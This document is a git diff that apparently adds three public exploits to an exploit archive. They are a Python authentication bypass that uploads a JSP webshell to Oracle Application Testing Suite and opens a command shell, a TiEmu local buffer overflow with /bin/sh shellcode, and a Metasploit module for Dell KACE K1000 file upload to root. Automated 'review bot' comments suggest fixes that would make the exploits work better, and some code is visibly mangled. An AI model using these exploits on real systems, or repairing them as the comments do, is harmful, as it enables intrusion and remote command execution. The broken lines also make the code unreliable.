diff --git a/files.csv b/files.csv
index 1edb6b361..1cc8bf48d 100755
--- a/files.csv
+++ b/files.csv
@@ -35908,3 +35908,6 @@ id,file,description,date,author,platform,type,port
 39686,platforms/android/dos/39686.txt,"Android - IMemory Native Interface is Insecure for IPC Use",2016-04-11,"Google Security Research",android,dos,0
 39687,platforms/jsp/webapps/39687.txt,"Novell Service Desk 7.1.0_ 7.0.3 and 6.5 - Multiple Vulnerabilities",2016-04-11,"Pedro Ribeiro",jsp,webapps,0
 39688,platforms/php/webapps/39688.txt,"Ovidentia troubleticketsModule 7.6 - Remote File Inclusion",2016-04-12,bd0rk,php,webapps,80
+39691,platforms/jsp/webapps/39691.py,"Oracle Application Testing Suite 12.4.0.2.0 - Authentication Bypass and Arbitrary File Upload Exploit",2016-04-13,"Zhou Yu",jsp,webapps,8088
+39692,platforms/linux/local/39692.py,"Texas Instrument Emulator 3.03 - Local Buffer Overflow",2016-04-13,"Juan Sacco",linux,local,0
+39693,platforms/unix/remote/39693.rb,"Dell KACE K1000 File Upload",2016-04-13,metasploit,unix,remote,0
diff --git a/platforms/jsp/webapps/39691.py b/platforms/jsp/webapps/39691.py
new file mode 100755
index 000000000..1aea01378
--- /dev/null
+++ b/platforms/jsp/webapps/39691.py
@@ -0,0 +1,107 @@
+# Exploit Title: Oracle Application Testing Suite Authentication Bypass and Arbitrary File Upload Remote Exploit
+# Exploit Author: Zhou Yu <504137480@qq.com >
+# Vendor Homepage: http://www.oracle.com/
+# Software Link: http://www.oracle.com/technetwork/oem/downloads/apptesting-downloads-1983826.html?ssSourceSiteId=otncn
+# Version: 12.4.0.2.0
+# Tested on: Win7 SP1 32-bit
+# CVE : CVE-2016-0492 and CVE-2016-0491
+
+import urllib2
+import urllib
+
+ip = '192.168.150.239'
+port = 8088
+
+url = "http://" + ip + ":" + str(port)
+#bypass authentication
+url = url+"/olt/Login.do/../../olt/UploadFileUpload.do"
+request = urllib2.Request(url)
+
+webshell_content='''
+<%@ page import="java.util.*,java.io.*" %>
+ <%
+ if (request.getParameter("{cmd}") != null) {{
+ Process p = Runtime.getRuntime().exec("cmd.exe /c " + request.getParameter("{cmd}"));
+ OutputStream os = p.getOutputStream();
+ InputStream in = p.getInputStream();
+ DataInputStream dis = new DataInputStream(in);
+ String disr = dis.readLine();
+ while (disr != null) {{
+ out.println(disr);
+ disr = dis.readLine();
+ }}
+ }}
+ %>
+'''
+boundary = "---------------------------7e01e2240a1e"
+request.add_header('Content-Type', "multipart/form-data; boundary=" + boundary)
+post_data = "--" + boundary + "\r\n"
+post_data = post_data + "Content-Disposition: form-data; name=\"storage.extension\"\r\n"
+post_data = post_data + "\r\n.jsp\r\n"
+post_data = post_data + "--" + boundary + "\r\n"
+post_data = post_data + "Content-Disposition: form-data; name=\"fileName1\"\r\n"
+post_data = post_data + "\r\nwebshell.jsp\r\n"
+post_data = post_data + "--" + boundary + "\r\n"
+post_data = post_data + "Content-Disposition: form-data; name=\"fileName2\"\r\n"
+post_data = post_data + "\r\n\r\n"
+post_data = post_data + "--" + boundary + "\r\n"
+post_data = post_data + "Content-Disposition: form-data; name=\"fileName3\"\r\n"
+post_data = post_data + "\r\n\r\n"
+post_data = post_data + "--" + boundary + "\r\n"
+post_data = post_data + "Content-Disposition: form-data; name=\"fileName4\"\r\n" +post_data = post_data + "\r\n\r\n" +post_data = post_data + "--" + boundary + "\r\n" +post_data = post_data + "Content-Disposition: form-data; name=\"fileType\"\r\n" +post_data = post_data + "\r\n*\r\n" +post_data = post_data + "--" + boundary + "\r\n" +post_data = post_data + "Content-Disposition: form-data; name=\"file1\"; filename=\"webshell.jsp\"\r\n" +post_data = post_data + "Content-Type: text/plain\r\n" +post_data = post_data + "\r\n" + webshell_content +"\r\n" +post_data = post_data + "--" + boundary + "\r\n" +post_data = post_data + "Content-Disposition: form-data; name=\"storage.repository\"\r\n" +post_data = post_data + "\r\nDefault\r\n" +post_data = post_data + "--" + boundary + "\r\n" +post_data = post_data + "Content-Disposition: form-data; name=\"storage.workspace\"\r\n" +post_data = post_data + "\r\n.\r\n" +post_data = post_data + "--" + boundary + "\r\n" +post_data = post_data + "Content-Disposition: form-data; name=\"directory\"\r\n" +post_data = post_data + "\r\n" + "../oats\servers\AdminServer\\tmp\_WL_user\oats_ee\\1ryhnd\war\pages" +"\r\n" +post_data = post_data + "--" + boundary + "--"+"\r\n" + +try: + request.add_data(post_data) + response = urllib2.urlopen(request) + if response.code == 200 : + print "[+]upload done!" + webshellurl = "http://" + ip + ":" + str(port) + "/olt/pages/webshell.jsp" + print "[+]wait a moment,detecting whether the webshell exists..." + if urllib2.urlopen(webshellurl).code == 200 : + print "[+]upload webshell successfully!" + print "[+]return a cmd shell" + while True: + cmd = raw_input(">>: ") + if cmd == "exit" : + break + print urllib.urlopen(webshellurl+"?{cmd}=" + cmd).read().lstrip() + else: + print "[-]attack fail!" + else: + print "[-]attack fail!" +except Exception as e: + print "[-]attack fail!" + +''' +#run the exploit and get a cmd shell +root@kali:~/Desktop# python exploit.py +[+]upload done! 
+[+]wait a moment,detecting whether the webshell exists...
+[+]upload webshell successfully!
+[+]return a cmd shell
+>>: whoami
+nt authority\system
+
+
+>>: exit
+'''
+
+
diff --git a/platforms/linux/local/39692.py b/platforms/linux/local/39692.py
new file mode 100755
index 000000000..e863e3f63
--- /dev/null
+++ b/platforms/linux/local/39692.py
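Review bot: The interactive loop at the end of the script sends the operator's command raw in the query string, `urllib.urlopen(webshellurl+"?{cmd}=" + cmd)`, so any command containing a space, `&`, `#` or `%` is truncated or mangled before it reaches the JSP; encode it first, `print urllib.urlopen(webshellurl + "?{cmd}=" + urllib.quote_plus(cmd)).read().lstrip()`. The `directory` field also hard-codes the WebLogic staging path `_WL_user\oats_ee\1ryhnd\war\pages`; the `1ryhnd` component looks like a per-deployment generated name, so on other installs the file is likely to land elsewhere and the 404 check will only print the generic `[-]attack fail!` — a comment saying this path must be adjusted per target would save the next user a debugging session. The `{{`/`}}` and `"{cmd}"` in `webshell_content` suggest a `str.format` call that is never made; it works only because doubled braces are legal nested blocks in Java and the request parameter is literally named `{cmd}`, which deserves a note. Finally `except Exception as e` never prints `e`, so an upload rejection, a JSP compile error and a network failure are all reported identically; print the exception.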
@@ -0,0 +1,70 @@ +# Exploit Author: Juan Sacco - http://www.exploitpack.com - +jsacco@exploitpack.com +# Program affected: Texas Instruments calculators emulator (without GDB) +# Version: 3.03-nogdb+dfsg-3 +# +# Tested and developed under: Kali Linux 2.0 x86 - https://www.kali.org +# Program description: TiEmu emulates Texas Instruments calculators TI +9/92/92+/V200PLT. +# Kali Linux 2.0 package: pool/main/t/tiemu/tiemu_3.03-nogdb+dfsg-3_i386.deb +# MD5sum: 79a42bb40dfa8437b6808a9072faf001 +# Website: http://lpg.ticalc.org/prj_tiemu/ +# +# +# Starting program: /usr/bin/tiemu -rom=$(python -c 'print "A"*80') +# [Thread debugging using libthread_db enabled] +# Using host libthread_db library +"/lib/i386-linux-gnu/i686/cmov/libthread_db.so.1". +# TiEmu 3 - Version 3.03 +# THIS PROGRAM COMES WITH ABSOLUTELY NO WARRANTY +# PLEASE READ THE DOCUMENTATION FOR DETAILS +# +# Program received signal SIGSEGV, Segmentation fault. +# +# 0x41414141 in ?? () +# +# gdb$ backtrace +#0 0xb7fdebe0 in __kernel_vsyscall () +#1 0xb6ec9367 in __GI_raise (sig=sig@entry=0x6) at +../nptl/sysdeps/unix/sysv/linux/raise.c:56 +#2 0xb6ecaa23 in __GI_abort () at abort.c:89 +#3 0xb6f07778 in __libc_message (do_abort=do_abort@entry=0x2, +fmt=fmt@entry=0xb6ffd715 "*** %s ***: %s +#4 0xb6f97b85 in __GI___fortify_fail (msg=msg@entry=0xb6ffd6fd "stack +smashing detected") at fortify_fail.c:31 +#5 0xb6f97b3a in __stack_chk_fail () at stack_chk_fail.c:28 +#6 0x0811beb3 in _start () + +import os,subprocess + +def run(): + try: + print "# Texas Instrument Emulator Buffer Overflow by Juan Sacco" + print "# This exploit is for educational purposes only" + # JUNK + SHELLCODE + NOPS + EIP + + junk = "\x41"*84 + shellcode = +"\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80" + nops = "\x90"*12 + eip = "\xd1\xf3\xff\xbf" + subprocess.call(["tiem ",'-rom= ', junk + shellcode + nops + eip]) + + except OSError as e: + if e.errno == os.errno.ENOENT: + print "Sorry, Texas Instrument emulator 
+ not found!"
+ else:
+ print "Error executing exploit"
+ raise
+
+def howtousage():
+ print "Snap! Something went wrong"
+ sys.exit(-1)
+
+if __name__ == '__main__':
+ try:
+ print "Exploit Tiem 3.03-nogdb+dfsg-3 Local Overflow Exploit"
+ print "Author: Juan Sacco"
+ except IndexError:
+ howtousage()
+run()
diff --git a/platforms/unix/remote/39693.rb b/platforms/unix/remote/39693.rb
new file mode 100755
index 000000000..f5154e4f8
--- /dev/null
+++ b/platforms/unix/remote/39693.rb
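Review bot: The `subprocess.call(["tiem ",'-rom= ', junk + shellcode + nops + eip])` line in `run()` cannot trigger the overflow shown in the header: it executes a binary literally named `tiem ` (trailing space, whereas the header trace runs `/usr/bin/tiemu`) and passes `-rom= ` and the payload as two separate argv entries, so the ROM option never receives the long string; it should read `subprocess.call(["tiemu", "-rom=" + junk + shellcode + nops + eip])`. `howtousage()` calls `sys.exit(-1)` but the file only imports `os` and `subprocess`, so reaching it raises NameError instead of exiting; add `import sys`. Several statements also appear split across lines (`shellcode =` with the string on the following line, and the `"Sorry, Texas Instrument emulator` string), which will not parse as written — this may be mail wrapping that happened before the commit, but the file should at least pass `python -m py_compile` before it is indexed. The fixed return address `\xd1\xf3\xff\xbf` presumably assumes ASLR is disabled on the Kali target; the header should state that requirement.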
@@ -0,0 +1,127 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::HttpClient
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Dell KACE K1000 File Upload',
+ 'Description' => %q{
+ This module exploits a file upload vulnerability in Kace K1000
+ versions 5.0 to 5.3, 5.4 prior to 5.4.76849 and 5.5 prior to 5.5.90547
+ which allows unauthenticated users to execute arbitrary commands
+ under the context of the 'www' user.
+
+ This module also abuses the 'KSudoClient::RunCommandWait' function
+ to gain root privileges.
+
+ This module has been tested successfully with Dell KACE K1000
+ version 5.3.
+ },
+ 'License' => MSF_LICENSE,
+ 'Privileged' => true,
+ 'Platform' => 'unix', # FreeBSD
+ 'Arch' => ARCH_CMD,
+ 'Author' =>
+ [
+ 'Bradley Austin (steponequit)', # Initial discovery and exploit
+ 'Brendan Coles ', # Metasploit
+ ],
+ 'References' =>
+ [
+ ['URL', 'http://console-cowboys.blogspot.com/2014/03/the-curious-case-of-ninjamonkeypiratela.html']
+ ],
+ 'Payload' =>
+ {
+ 'Space' => 1024,
+ 'BadChars' => "\x00\x27",
+ 'DisableNops' => true,
+ 'Compat' =>
+ {
+ 'PayloadType' => 'cmd',
+ 'RequiredCmd' => 'generic perl'
+ }
+ },
+ 'DefaultTarget' => 0,
+ 'Targets' =>
+ [
+ ['Automatic Targeting', { 'auto' => true }]
+ ],
+ 'DisclosureDate' => 'Mar 7 2014'))
+ end
+
+ def check
+ res = send_request_cgi('uri' => normalize_uri('service', 'kbot_upload.php'))
+ unless res
+ vprint_error('Connection failed')
+ return Exploit::CheckCode::Unknown
+ end
+ if res.code && res.code == 500 && res.headers['X-DellKACE-Appliance'].downcase == 'k1000'
+ if res.headers['X-DellKACE-Version'] =~ /\A([0-9])\.([0-9])\.([0-9]+)\z/
+ vprint_status("Found Dell KACE K1000 version #{res.headers['X-DellKACE-Version']}")
+ if $1.to_i == 5 && $2.to_i <= 3 # 5.0 to 5.3
+ return Exploit::CheckCode::Vulnerable
+ elsif $1.to_i == 5 && $2.to_i == 4 && $3.to_i <= 76849 # 5.4 prior to 5.4.76849
+ return Exploit::CheckCode::Vulnerable
+ elsif $1.to_i == 5 && $2.to_i == 5 && $3.to_i <= 90547 # 5.5 prior to 5.5.90547
+ return Exploit::CheckCode::Vulnerable
+ end
+ return Exploit::CheckCode::Safe
+ end
+ return Exploit::CheckCode::Detected
+ end
+ Exploit::CheckCode::Safe
+ end
+
+ def exploit
+ # upload payload
+ fname = ".#{rand_text_alphanumeric(rand(8) + 5)}.php"
+ payload_path = "/kbox/kboxwww/tmp/"
+ post_data = ""
+ print_status("Uploading #{fname} (#{post_data.length} bytes)")
+ res = send_request_cgi(
+ 'uri' => normalize_uri('service', 'kbot_upload.php'),
+ 'method' => 'POST',
+ 'vars_get' => Hash[{
+ 'filename' => fname,
+ 'machineId' => "#{'../' * (rand(5) + 4)}#{payload_path}",
+ 'checksum' => 'SCRAMBLE',
+ 'mac' => rand_text_alphanumeric(rand(8) + 5),
+ 'kbotId' => rand_text_alphanumeric(rand(8) + 5),
+ 'version' => rand_text_alphanumeric(rand(8) + 5),
+ 'patchsecheduleid' => rand_text_alphanumeric(rand(8) + 5) }.to_a.shuffle],
+ 'data' => post_data)
+
+ unless res
+ fail_with(Failure::Unreachable, 'Connection failed')
+ end
+
+ if res.code && res.code == 200
+ print_good('Payload uploaded successfully')
+ else
+ fail_with(Failure::UnexpectedReply, 'Unable to upload payload')
+ end
+
+ # execute payload
+ res = send_request_cgi('uri' => normalize_uri('tmp', fname))
+
+ unless res
+ fail_with(Failure::Unreachable, 'Connection failed')
+ end
+
+ if res.code && res.code == 200
+ print_good('Payload executed successfully')
+ elsif res.code && res.code == 404
+ fail_with(Failure::NotVulnerable, "Could not find payload '#{fname}'")
+ else
+ fail_with(Failure::UnexpectedReply, 'Unable to execute payload')
+ end
+ end
+end
\ No newline at end of file
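Review bot: In `check`, `res.headers['X-DellKACE-Appliance'].downcase` is evaluated as soon as the response code is 500, so any non-KACE host that answers 500 without that header raises NoMethodError on nil instead of returning Safe; guard it with `res.headers['X-DellKACE-Appliance'].to_s.downcase == 'k1000'`. The version gates use `$3.to_i <= 76849` and `$3.to_i <= 90547`, which mark the fixed builds 5.4.76849 and 5.5.90547 themselves as Vulnerable even though the description says "prior to" those builds; both comparisons should be `<`. In `exploit`, `post_data = ""` means a zero-byte file is uploaded and the later 200 on `/tmp/<fname>` only proves the traversal wrote a file, not that anything executed — this may be a `<?php ... ?>` wrapper lost when the page was rendered, but as listed `payload.encoded` is never sent and the module should be checked against the framework source before it is trusted. The version regex `/\A([0-9])\.([0-9])\.([0-9]+)\z/` also rejects a two-digit minor component, so such a build would fall through to Detected rather than being classified; probably acceptable, but worth a comment.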